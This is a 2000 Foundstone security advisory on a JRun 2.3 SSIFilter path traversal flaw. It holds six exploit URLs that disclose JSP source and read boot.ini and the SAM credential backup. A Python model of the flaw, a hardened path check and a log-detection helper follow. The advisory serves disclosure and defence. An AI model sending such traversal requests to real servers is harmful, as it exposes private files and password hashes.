Subject: Allaire JRUN 2.3 Arbitrary File Retrieval
From: Foundstone Labs (labs@FOUNDSTONE.COM)
Date: Mon Oct 23 2000 - 13:28:28 CDT
- Next message: Foundstone Labs: "Allaire JRUN 2.3 Remote command execution"
- Previous message: Foundstone Labs: "Allaire's JRUN Unauthenticated Access to WEB-INF directory"
Foundstone, Inc.
http://www.foundstone.com
"Securing the Dot Com World"
Security Advisory
Allaire JRUN 2.3
----------------------------------------------------------------------
FS Advisory ID: FS-102300-13-JRUN
Release Date: October 23, 2000
Product: Allaire JRUN 2.3
Vendor: Allaire Inc. (http://www.allaire.com)
Vendor Advisory: http://www.allaire.com/security/
Type: Arbitrary File Retrieval
Severity: High
Author: Shreeraj Shah (shreeraj.shah@foundstone.com)
Saumil Shah (saumil.shah@foundstone.com)
Stuart McClure (stuart.mcclure@foundstone.com)
Foundstone, Inc. (http://www.foundstone.com)
Operating Systems: All operating systems supported by JRUN
Vulnerable versions: JRUN Server v2.3
Foundstone Advisory:
http://www.foundstone.com/cgi-bin/display.cgi?Section_ID=13
----------------------------------------------------------------------
Description
Multiple source code disclosure ("show code") vulnerabilities exist
in Allaire's JRun Server 2.3, allowing a remote attacker to view the
source code of any file within the web document root of the web
server (for example, JSP pages that would normally be compiled and
executed rather than returned as text).
Using the same vulnerability, it is also possible to retrieve
arbitrary files that lie outside the web document root on the
host operating system's file system.
Details
JRun 2.3 uses Java servlets to handle parsing of various types
of pages (for example, HTML, JSP, etc.). Based on the settings
in the rules.properties and servlets.properties files, any
servlet can be invoked by its fully qualified class name, or by
its configured alias, under the URL prefix "/servlet/".
It is possible to use JRun's SSIFilter servlet to retrieve
arbitrary files on the target system. The path supplied after the
servlet name is resolved as a file path, and "../" segments are not
rejected, so the request can climb out of the servlet's virtual
directory. The following examples show the URLs that can be used:
in each set, the first request returns a JSP inside the document
root as plain text (source disclosure), while the others read files
outside the document root (here, the Windows boot.ini and the
compressed backup of the SAM database under winnt\repair). The
first set invokes the servlet by its fully qualified class name,
the second by its alias "ssifilter":
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._
Note: It is assumed that JRun runs on host "jrun", port 8000.
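The following Python is an added illustration written for this page; it is not JRun's code, nor Foundstone's or Allaire's. It models the flaw described above (the request path appended to a document root and handed to the filesystem, which collapses the ".." segments) beside a hardened resolver that decodes once, refuses dot segments outright and confirms the result still lies under the document root, and it adds a small log-review helper that flags SSIFilter requests carrying a parent-directory segment, percent-encoded or not. The document root /opt/jrun/htdocs and the request-to-file mapping are assumptions; the advisory's six URLs are used as the sample input.

```python
"""Model of the JRun 2.3 SSIFilter traversal and a hardened path check.

Illustrative code added for this page, not JRun's implementation.
DOC_ROOT and the URL-to-file mapping are assumptions.
"""
import posixpath
from urllib.parse import unquote, urlsplit

# Assumed document root; the advisory does not state JRun's layout.
DOC_ROOT = "/opt/jrun/htdocs"

# The two ways the advisory invokes the SSI filter servlet.
SSI_PREFIXES = (
    "/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/",
    "/servlet/ssifilter/",
)

# The six URLs from the advisory, used here as sample input.
ADVISORY_URLS = (
    "http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp",
    "http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini",
    "http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../winnt/repair/sam._",
    "http://jrun:8000/servlet/ssifilter/../../test.jsp",
    "http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini",
    "http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._",
)


def vulnerable_resolve(url: str) -> str:
    """Model of the flaw: the decoded URL path is glued onto DOC_ROOT and the
    filesystem collapses the '..' segments.  Returns the path that would
    actually be opened, which may be anywhere on disk."""
    path = unquote(urlsplit(url).path)
    return posixpath.normpath(DOC_ROOT + path)


def hardened_resolve(url: str):
    """Decode once, refuse any dot segment, then normalize and require the
    result to stay under DOC_ROOT.  Rejecting dot segments outright also
    stops the in-root 'show code' case (../../test.jsp), which a pure
    containment check would let through.  Returns the path or None."""
    path = unquote(urlsplit(url).path)
    if any(seg in (".", "..") for seg in path.split("/")):
        return None
    full = posixpath.normpath(posixpath.join(DOC_ROOT, path.lstrip("/")))
    if full != DOC_ROOT and not full.startswith(DOC_ROOT + "/"):
        return None
    return full


def is_ssifilter_traversal(request_path: str) -> bool:
    """Log-review helper: True for a request to either SSIFilter prefix whose
    decoded path contains a parent-directory segment (catches %2e%2e too)."""
    decoded = unquote(request_path)
    lower = decoded.lower()
    if not any(lower.startswith(p.lower()) for p in SSI_PREFIXES):
        return False
    return ".." in decoded.split("/")


if __name__ == "__main__":
    for u in ADVISORY_URLS:
        print(f"{u}\n  vulnerable -> {vulnerable_resolve(u)}"
              f"\n  hardened   -> {hardened_resolve(u)}")
```

Run as a script, the two test.jsp requests resolve inside the document root under the vulnerable model (the JSP is returned as a file rather than executed), and the boot.ini and sam._ requests resolve to the filesystem root, outside it; the hardened resolver rejects all six. The percent-decoding step matters for detection: a request written as %2e%2e/%2e%2e is the same traversal and must be caught by the same rule.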
Solution
Follow the recommendations given in Allaire Security Bulletin
ASB00-28, available at: http://www.allaire.com/security/
Credits
We would like to thank Allaire for their prompt reaction
to this problem and their co-operation in heightening
security awareness in the security community.
Disclaimer
The information contained in this advisory is the copyright
(C) 2000 of Foundstone, Inc. and believed to be accurate at
the time of printing, but no representation or warranty is
given, express or implied, as to its accuracy or completeness.
Neither the author nor the publisher accepts any liability
whatsoever for any direct, indirect or consequential loss or
damage arising in any way from any use of, or reliance placed
on, this information for any purpose. This advisory may be
redistributed provided that no fee is assigned and that the
advisory is not modified in any way.